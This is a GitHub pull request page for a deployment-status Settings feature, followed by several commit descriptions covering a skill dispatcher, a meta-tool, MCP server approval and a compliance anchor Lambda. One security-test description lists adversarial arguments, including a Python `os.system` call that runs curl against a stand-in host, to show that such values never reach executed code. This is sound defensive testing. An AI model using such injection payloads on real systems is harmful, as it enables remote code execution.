feat: add deployment status to Settings page by ericodom · Pull Request #7 · thinkwork-ai/thinkwork

ericodom · 2026-04-12T21:44:58Z

Summary

- Add `deploymentStatus` GraphQL query + resolver that reads Lambda env vars (no DB, no live AWS calls)
- Add `DeploymentStatus` type to GraphQL schema with stage, region, services, resources, and URLs
- Update Settings page with two new cards: Deployment (stage, region, account, service statuses) and Resources & URLs (S3, DB, ECR, clickable links)
- Add Terraform env vars (`ADMIN_URL`, `DOCS_URL`, `APPSYNC_REALTIME_URL`, `ECR_REPOSITORY_URL`, `AWS_ACCOUNT_ID`) to Lambda `common_env`
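The env-var-only approach in the summary can be sketched roughly as follows. This is a minimal illustration in Python, not the PR's resolver: the field names (`adminUrl`, `docsUrl`, and so on), the `STAGE` and `AWS_REGION` variable names, and the helper `visible_rows` are assumptions made for the example. Only the five Terraform variable names come from the summary.

```python
import os
from typing import Mapping, Optional

# Hypothetical mapping from response fields to env var names.
# The env var names are from the PR summary; the field names are assumed.
URL_ENV_VARS = {
    "adminUrl": "ADMIN_URL",
    "docsUrl": "DOCS_URL",
    "appsyncRealtimeUrl": "APPSYNC_REALTIME_URL",
    "ecrRepositoryUrl": "ECR_REPOSITORY_URL",
}


def _read(env: Mapping[str, str], name: str) -> Optional[str]:
    """Return the trimmed value, or None when the variable is unset or empty."""
    value = env.get(name, "").strip()
    return value or None


def deployment_status(env: Mapping[str, str] = os.environ) -> dict:
    """Build the status payload from environment variables only (no DB, no AWS calls)."""
    return {
        "stage": _read(env, "STAGE"),        # assumed variable name
        "region": _read(env, "AWS_REGION"),  # assumed variable name
        "accountId": _read(env, "AWS_ACCOUNT_ID"),
        "urls": {field: _read(env, var) for field, var in URL_ENV_VARS.items()},
    }


def visible_rows(status: dict) -> list:
    """Rows a UI might render: entries with no value are hidden."""
    return [(label, value) for label, value in status["urls"].items() if value is not None]
```

Passing the environment as a parameter keeps the function testable without touching the real process environment.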

Test plan

- `terraform plan` confirms new env vars are added without drift
- Admin app builds with no new type errors
- Settings page renders Deployment and Resources cards after deploy
- URLs are clickable and open in new tabs
- Graceful handling when env vars are empty (rows hidden)

🤖 Generated with Claude Code

Surface deployment infrastructure info (stage, region, services, resources, URLs) on the admin Settings page via a new `deploymentStatus` GraphQL query that reads Lambda environment variables.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

…SI-2/3/6) (#510)

Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today: the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer.

## What lands

### `container-sources/skill_session_pool.py`

Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API:

- `acquire(key) -> SessionHandle` (warm reuse or fresh start)
- `handle.release()`
- `flush_for_tenant(tenant_id)`: U12 kill-switch path
- `flush_all()`: ops escape hatch
- `prune_idle()`: caller decides cadence; exposed so tests advance time

### `container-sources/skill_dispatcher.py`

`dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`. Security invariants enforced:

- **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source.
- **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session.
- Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded).
- Stdout parsed as JSON; structured errors (SkillOutputParseError, SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same `DispatchResult` shape for uniform audit downstream.

SI-3 (user-scoped pool key) is enforced structurally in the pool itself.

### `test_skill_session_pool.py` (9 cases)

Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all.

### `test_skill_dispatcher.py` (9 cases)

Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure.

### `test_skill_dispatcher_security.py` (6 cases)

Each named with its SI number so grep surfaces coverage at review time:

- SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through _args.json unchanged, never appear in the exec string.
- SI-2: exec template byte-identical across two invocations with different args, a structural assertion that fails if anyone ever reintroduces interpolation.
- SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates.
- SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug.

### Wiring

- `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed.
- `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers.

## What this does NOT do

- Does NOT wire the dispatcher into server.py's Agent(tools=...) flow. That's U5 (Skill meta-tool).
- Does NOT extract the quota/audit loop from server.py:682-755. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires, since extracting now would add a seam with no caller yet.
- Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness.

## Test plan

- [x] `uv run ... pytest` on the three new files: 24 tests green
- [x] Full `pytest packages/agentcore-strands/agent-container/`: 211 green (24 new + 187 existing)
- [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests)
- [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts`: 9 tests green
- [x] ruff import-sort clean on every new file
- [x] prettier clean on every touched TS file

Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4).

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
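The SI-2 and SI-6 invariants described in #510 can be illustrated with a small sketch. It is not the dispatcher's actual template: the `.main` entry module, the choice to carry the slug inside `_args.json`, and the helper name `build_invocation` are assumptions made so the example stays self-contained. The point it shows is that the code string is a constant and every model-controlled value travels as data.

```python
import json

# Fixed source text sent to the sandbox. Nothing is interpolated into it.
# Assumption: the skill's entry point lives at scripts.<slug>.main and exposes run().
EXEC_TEMPLATE = '''\
import importlib, json, sys
with open("_args.json") as fh:
    payload = json.load(fh)
prefix = "scripts." + payload["slug"]
# SI-6: drop cached modules so a patch from an earlier call cannot survive.
for name in [m for m in sys.modules if m == prefix or m.startswith(prefix + ".")]:
    del sys.modules[name]
importlib.invalidate_caches()
module = importlib.import_module(prefix + ".main")
print(json.dumps(module.run(**payload["args"])))
'''


def build_invocation(skill_slug: str, args: dict) -> tuple:
    """Return (files_to_write, code_to_execute) for one skill call.

    SI-2: args are serialized into a file; the code string never changes.
    """
    files = {"_args.json": json.dumps({"slug": skill_slug, "args": args})}
    return files, EXEC_TEMPLATE
```

A byte-identity check between two invocations with different args, like the one the security tests describe, follows directly from returning the same constant each time.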


…s inert) (#511)

The single `Skill(name, args)` meta-tool that U6 flips to be the sole invocation path once U7's shadow harness validates equivalence. Today it ships as inert code: the Dockerfile wildcard COPY picks it up (via U2a) and _boot_assert registers it, but server.py's live Agent(tools=...) path still routes through the existing run_skill_dispatch / composition_runner code.

## Why ship inert

The plan (#7 §U4/U5/U6/U7) explicitly gates U6's cutover on U7 PASS; U7 is the shadow harness that dual-dispatches both the old and new paths on real invocations and measures divergence. Wiring U5 into the live Agent(tools=...) before U7 exists would swap the invocation path without the safety net the plan itself calls for. This PR therefore ships the module + tests and defers server.py wiring to U7.

## What lands

### `container-sources/skill_meta_tool.py`

- `SessionAllowlist`: intersection of `tenant_skills ∩ template_skills ∩ ¬template_blocks ∩ ¬tenant_kill_switches` pre-computed once at Agent(tools=...). Narrow-only: a template cannot widen past what the tenant enabled (plan R6/R7).
- `invoke_skill(name, args, *, ctx)`: pure entry point the Strands @tool wrapper calls. Routes script-bundle skills to U4's `dispatch_skill_script`; pure-SKILL.md skills return their body for in-prompt consumption (no sandbox roundtrip).
- `build_skill_meta_tool(ctx)`: factory returning the coroutine the `@strands.tool` decorator wraps. Decoupled from the SDK so unit tests exercise the full decision tree without importing strands.
- `intersect_allowed_tools(declared, session_tools)`: narrow-only intersection of a skill's declared `allowed-tools` frontmatter against the session's effective tool set. Warns on declared-but-missing so operators can spot disabled dependencies.
- `SkillUnauthorized`: distinct error from `SkillNotFound` so the model cannot enumerate tenant-scoped catalog membership by probing slugs. Both raise; the audit log gets full context.

### `test_skill_meta_tool.py` (12 cases)

Covers plan AE4 + every listed test scenario:

- happy path: Skill("sales-prep") routes to dispatcher with correct args
- nested Skill() threads the same TurnCounters through
- pure-SKILL.md slug returns body, no sandbox
- unknown slug → SkillNotFound
- in catalog but not in session → SkillUnauthorized
- SessionAllowlist triple-constraint intersection correctness
- tenant kill-switch trumps template enablement (R7 precedence)
- allowed-tools frontmatter narrows (never widens) past session tools
- build_skill_meta_tool closure captures ctx correctly

### `_boot_assert.EXPECTED_CONTAINER_SOURCES`

Adds skill_meta_tool so the Dockerfile RUN asserts it landed.

## What this PR does NOT do

- Does NOT wire `Skill` into server.py's Agent(tools=...). Deferred to U7 (shadow wiring) then U6 (canonical cutover).
- Does NOT drop the AGENTS.md-conditional around AgentSkills. Plan calls for this at U5 but it's entangled with the live-path swap, so it lands alongside the cutover.
- Does NOT suppress AgentSkills' built-in `skills` tool. Same reason: suppression only makes sense once `Skill` is the canonical path.

## Test counts

- `test_skill_meta_tool.py`: 12 cases
- Full agent-container suite: 223 green (12 new + 211 existing)
- ruff import-sort clean on new files

Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U5).

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
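The narrow-only set arithmetic behind `SessionAllowlist` and `intersect_allowed_tools` in #511 might look roughly like this. It is a sketch under assumptions: the class shape, the `compute` and `permits` method names, and the list return type are invented for illustration; only the four input sets and the `intersect_allowed_tools(declared, session_tools)` signature come from the description.

```python
import logging
from dataclasses import dataclass

logger = logging.getLogger("skill_meta_tool_sketch")


@dataclass(frozen=True)
class SessionAllowlist:
    """Skills usable in one session, computed once up front (assumed shape)."""

    allowed: frozenset

    @classmethod
    def compute(cls, tenant_skills, template_skills, template_blocks, tenant_kill_switches):
        # tenant ∩ template, minus template blocks, minus tenant kill switches.
        # Subtraction happens last, so a kill switch always wins.
        allowed = set(tenant_skills) & set(template_skills)
        allowed -= set(template_blocks)
        allowed -= set(tenant_kill_switches)
        return cls(frozenset(allowed))

    def permits(self, slug: str) -> bool:
        return slug in self.allowed


def intersect_allowed_tools(declared, session_tools):
    """Keep only declared tools the session actually has; never add any."""
    session = set(session_tools)
    missing = [tool for tool in declared if tool not in session]
    if missing:
        # Surface declared-but-missing tools so operators can spot disabled dependencies.
        logger.warning("declared tools not available in session: %s", missing)
    return [tool for tool in declared if tool in session]
```

Because every step is an intersection or a subtraction, no input can widen the result past what the tenant enabled.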

…520)

Wires the admin decision surface for plugin-uploaded MCP servers. Plan §U11 lands:

- `POST /api/tenants/:tenantId/mcp-servers/:serverId/approve` computes `url_hash = sha256(canonical(url, auth_config))`, sets `status='approved'` + `approved_by` + `approved_at`.
- `POST /api/tenants/:tenantId/mcp-servers/:serverId/reject` clears approval metadata; reason captured in CloudWatch audit log.
- `buildMcpConfigs` SQL gate narrows to `status='approved' AND enabled=true`, with an in-code defensive hash-match check for drift (grandfathered `url_hash IS NULL` rows pass through).
- `applyMcpServerFieldUpdate` reverts approved rows back to `pending` on any url/auth_config mutation (SI-5). mcpUpdateServer + mcpRegisterServer upsert + DCR cache route through it; DCR stays approved by recomputing url_hash (system-internal discovery, not admin intent).
- Daily EventBridge sweeper auto-rejects pending rows older than 30 days.
- Admin SPA renders the approval badge and surfaces Approve / Reject buttons for pending rows; Reject accepts an optional reason.
- Cognito-only client (`cognitoFetch`) for the approval routes; mirrors plugin-upload.ts's REST analogue of requireTenantAdmin.
- 40 new unit tests: hash canonicalization, approve/reject handler (authz + tenant isolation), SI-5 url-swap protection, TTL sweeper, and buildMcpConfigs approved-filter behavior.

Terraform wires two new handlers (`mcp-approval`, `mcp-approval-sweeper`), four new API Gateway routes, and a daily cron. No schema migration required: `status`, `url_hash`, `approved_by`, `approved_at` all landed with U3 migration 0025.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
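The approval hash and the SI-5 revert rule can be sketched as below. This is an illustration in Python, not the repository's code: the canonical form (sorted-key compact JSON), the dict-shaped rows, and the function names `compute_url_hash`, `is_servable`, and `apply_field_update` are all assumptions. The source only states that the hash is `sha256(canonical(url, auth_config))`, that rows with a null hash pass through, and that url/auth_config mutations revert approved rows to `pending`.

```python
import hashlib
import json


def canonical(url, auth_config) -> str:
    # Assumed canonical form: compact JSON with sorted keys, so key order
    # in auth_config does not change the hash.
    return json.dumps(
        {"url": url.strip(), "auth_config": auth_config},
        sort_keys=True,
        separators=(",", ":"),
    )


def compute_url_hash(url, auth_config) -> str:
    return hashlib.sha256(canonical(url, auth_config).encode("utf-8")).hexdigest()


def is_servable(row: dict) -> bool:
    """Gate a row: approved + enabled, plus a defensive hash-match check."""
    if row["status"] != "approved" or not row["enabled"]:
        return False
    if row.get("url_hash") is None:
        return True  # grandfathered rows without a recorded hash pass through
    return row["url_hash"] == compute_url_hash(row["url"], row["auth_config"])


def apply_field_update(row: dict, *, url=None, auth_config=None) -> dict:
    """Return an updated copy; an approved row whose url or auth_config changes reverts to pending."""
    updated = dict(row)
    if url is not None:
        updated["url"] = url
    if auth_config is not None:
        updated["auth_config"] = auth_config
    changed = (updated["url"], updated["auth_config"]) != (row["url"], row["auth_config"])
    if changed and row["status"] == "approved":
        updated["status"] = "pending"
    return updated
```

The hash-match check inside `is_servable` is the second line of defense: even if a mutation somehow bypassed the revert path, a drifted URL would no longer match the approved hash.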



…k retention) (#927)

* feat(compliance): U8b - anchor Lambda live (S3 PutObject + Object Lock retention)

  Replaces `_anchor_fn_inert` with `_anchor_fn_live`, which performs the actual S3 PutObject of per-tenant proof slices and the global anchor JSON to the WORM-locked compliance bucket. The anchor object carries an explicit `ObjectLockMode` + `ObjectLockRetainUntilDate` per-object override (mirroring the bucket-default), so the retention contract is portable across buckets and visible at the call site. Slices write under `proofs/tenant-{id}/cadence-{cadence_id}.json` (no per-object lock; bucket default applies); anchor writes last so a partial failure never publishes a verifier-discoverable commit point.

  Five guards land alongside the body swap:

  * **Deterministic cadence_id**: sha256 of canonical chain-head fingerprint, reshaped to UUIDv7 form. Same heads produce the same cadence_id, so a retry after a partial failure overwrites its own slice keys instead of orphaning slices for the full 365-day retention window.
  * **Merkle self-check**: `_anchor_fn_live` recomputes the root from the received leaves and asserts equality before any PutObject. Cheap insurance against latent runAnchorPass arithmetic bugs becoming WORM-locked poisoned evidence.
  * **Layer 2 body-swap test**: `compliance-anchor-s3-spy.test.ts` mocks S3Client.send and asserts the live function actually issues PutObjectCommand for both slices and anchor (with SHA256 checksum, SSE-KMS, and ObjectLock retention on the anchor key only). Pairs with the Layer 1 identity assertion (`getWiredAnchorFn() === _anchor_fn_live`) in the integration test.
  * **Sibling watchdog IAM role**: watchdog moves OFF the shared lambda role onto a dedicated role with `kms:DescribeKey` only on the bucket CMK (NOT `kms:Decrypt`; the watchdog never reads object bodies), `s3:ListBucket` prefix-conditioned on `anchors/`, and an explicit Deny on every Delete + Bypass + Lock-mutation action so future role broadening cannot turn the watchdog into a deletion vector.
  * **Dev-COMPLIANCE precondition**: `var.allow_compliance_in_non_prod` (default false) blocks accidentally locking a dev bucket into irreversible COMPLIANCE bytes via a stage typo.

  Watchdog flips to live: `mode: "live"`, ListObjectsV2 with 1000-key truncation warning, max-LastModified pick, `ComplianceAnchorGap` metric emission (suppressed on greenfield-empty bucket), heartbeat unchanged. The CloudWatch alarm cuts over: gap → `treat_missing_data = breaching` (catches both real gaps and a watchdog-down regression); a sibling heartbeat-missing alarm is born `notBreaching` so deploy-time gaps don't fire it before the first heartbeat lands (Decision #7).

  Operator pre-merge step: `terraform state mv` the watchdog from the for_each handler set to the new standalone resource address. Without it, the next `terraform apply` fails with ResourceConflictException on the function name. Plan documents the exact command.

  Plan: docs/plans/2026-05-07-012-feat-compliance-u8b-anchor-lambda-live-plan.md
  Master plan: docs/plans/2026-05-06-011-feat-compliance-audit-event-log-plan.md (U8b)

  Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(review): apply autofix feedback

  Drop unused drizzle-orm imports flagged by ce-code-review:

  - compliance-anchor.ts: `and`, `eq`, `gt`, plus the `auditEvents` schema import (raw SQL via `` sql`...` `` is the actual codepath there)
  - compliance-anchor.integration.test.ts: `and`, `gt`, `auditOutbox`

  Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(compliance): make compliance-anchor.test.ts stub anchorFn async

  `AnchorFn` is now `=> Promise<...>` in U8b. The timestamp-normalization test added in #925 used a sync stub, which fails typecheck against the new contract. Switch the stub to `async () => ({ anchored: false })`; the test still exercises the same path (recorded_at coercion → drainer update) since runAnchorPass awaits the result either way.

  Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
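Two of the guards in #927, the deterministic cadence_id and the Merkle self-check, lend themselves to a short sketch. The code below is a Python illustration under stated assumptions, not the Lambda's implementation: the fingerprint encoding (sorted tenant/head pairs as compact JSON), the tree construction (SHA-256 over concatenated pairs, last node duplicated on odd levels), and all function names are invented for the example. What it demonstrates is the idea from the commit message: identical chain heads always yield the same UUIDv7-shaped id, and a root mismatch stops the write before anything is stored.

```python
import hashlib
import json
import uuid


def cadence_id(chain_heads: dict) -> str:
    """Derive a stable, UUIDv7-shaped id from the chain heads (assumed encoding)."""
    fingerprint = json.dumps(sorted(chain_heads.items()), separators=(",", ":"))
    raw = bytearray(hashlib.sha256(fingerprint.encode("utf-8")).digest()[:16])
    raw[6] = (raw[6] & 0x0F) | 0x70  # version nibble = 7
    raw[8] = (raw[8] & 0x3F) | 0x80  # RFC 4122 variant bits = 10
    return str(uuid.UUID(bytes=bytes(raw)))


def merkle_root(leaves: list) -> bytes:
    """Assumed construction: hash leaves, then hash concatenated pairs upward."""
    if not leaves:
        raise ValueError("at least one leaf is required")
    level = [hashlib.sha256(leaf).digest() for leaf in leaves]
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])  # duplicate the last node on odd levels
        level = [
            hashlib.sha256(level[i] + level[i + 1]).digest()
            for i in range(0, len(level), 2)
        ]
    return level[0]


def assert_root_matches(leaves: list, claimed_root: bytes) -> None:
    """Self-check to run before any write: recompute and compare."""
    if merkle_root(leaves) != claimed_root:
        raise ValueError("Merkle root mismatch; refusing to write anchor")
```

Since a retry with the same heads maps to the same id, it would target the same slice keys rather than creating new ones.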

ericodom merged commit 17758b3 into main Apr 12, 2026
3 checks passed

ericodom deleted the feat/settings-deployment-status branch April 12, 2026 22:02

ericodom mentioned this pull request Apr 24, 2026

feat(U6): delete composition runner + skill_catalog.execution/mode #542

Merged

8 tasks

ericodom added a commit that referenced this pull request May 5, 2026

Merge pull request #7 from thinkwork-ai/feat/settings-deployment-status

74a9de3

feat: add deployment status to Settings page
